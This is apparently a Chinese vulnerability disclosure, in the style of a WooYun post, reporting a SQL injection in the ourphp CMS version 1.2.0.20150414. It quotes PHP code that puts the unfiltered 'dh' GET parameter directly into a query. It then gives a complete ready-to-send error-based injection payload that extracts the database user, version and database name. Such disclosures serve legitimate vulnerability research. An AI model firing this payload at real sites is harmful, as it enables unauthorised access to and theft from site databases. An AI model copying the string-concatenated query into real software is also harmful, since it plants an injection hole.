ourphp最新版注入漏洞又1枚
看到wooyun上ourphp这个厂商又出新的版本了,说修改了wooyun上现有的漏洞,我也来凑凑热闹吧。下载最新版本(ourphp_v1.2.0.20150414),2015-04-14更新的,研究学习一下。 注入一枚(这个地方前面提了下个漏洞了,当时没有注意到竟然还有个参数存在注入,无心刷洞): GET /client/user/?cn-usershopping.html-&ourphp_cms=del&id=1&dh=1 其中dh未过滤,存在注入,看代码
``
无关代码
elseif ($_GET["ourphp_cms"] == "del"){
$query = $db-> sqllist("select
id,
OP_Orderspay,
OP_Orderssendfrom
ourphp_orderswhere
id= ".$_GET['id']." &&
OP_Ordersnumber` = '".$_GET['dh']."'");
$ourphp_rs = mysql_fetch_array($query);
if(!mysql_num_rows($query)){
exit("no!");
}
if($ourphp_rs[1] == 2){
exit("no!");
}
if($ourphp_rs[2] == 2){
exit("no!");
}
$query = $db-> sqllist("delete from `ourphp_orders` where `id` = '".$_GET['id']."'");
exit("<script language=javascript>location.replace('".$ourphp_webpath."client/user/?".$ourphp_Language."-usershopping.html');</script>");
} ```
直接把通过GET获得dh带入了sql语句执行,可注入出任意数据 Payload:GET提交
/client/user/?cn-usershopping.html-&ourphp_cms=del&id=1&dh=1'/**/UNION/**/SELECT/**/1/**/FROM(SELECT/**/COUNT(*),CONCAT(0x23,(SELECT/**/concat(user(),0x23,version(),0x23,database())/**/FROM/**/ourphp_admin/**/LIMIT/**/0,1),0x23,FLOOR(RAND(0)*2))x/**/FROM/**/INFORMATION_SCHEMA.tables/**/GROUP/**/BY/**/x)a%23
测试如下图
见 详细说明